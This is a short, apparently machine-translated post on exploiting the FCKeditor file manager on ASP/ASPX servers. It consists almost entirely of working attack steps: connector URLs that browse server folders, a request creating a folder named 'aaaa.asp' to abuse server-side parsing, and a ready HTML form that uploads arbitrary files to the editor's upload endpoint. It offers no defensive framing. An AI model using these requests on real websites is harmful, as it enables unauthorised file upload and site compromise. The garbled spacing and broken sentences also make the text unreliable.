Fckeditor asp/aspx
There are several fckeditors in the past two days, and browser.htmlor test.html is not included in the final result. Here we will provide several url addresses:
Http://www.oday.pw/fckeditor/editor/filemanager/connectors/aspx/connector.aspx? Command = & Type = File & CurrentFolder =/directly browse the File and directly create a folder (. asp ):
Http://www.oday.pw/fckeditor/editor/filemanager/connectors/aspx/connector.aspx? Command = CreateFolder & Type = File & CurrentFolder = % 2F & NewFolderName = aaaa. asp & uuid = 1279433158781 the last & uuid = 1279433158781 can be, or you can directly upload files without (random:
<Form id = "frmUpload" enctype = "multipart/form-data" action = "http://www.xxx.com//fckeditor/editor/filemanager/connectors/aspx/upload.aspx? Type = Media "method =" post "> Upload a new file: <br> <input type = "file" name = "NewFile" size = "50"> <br> <input id = "btnUpload" type = "submit" value = "Upload "> </form>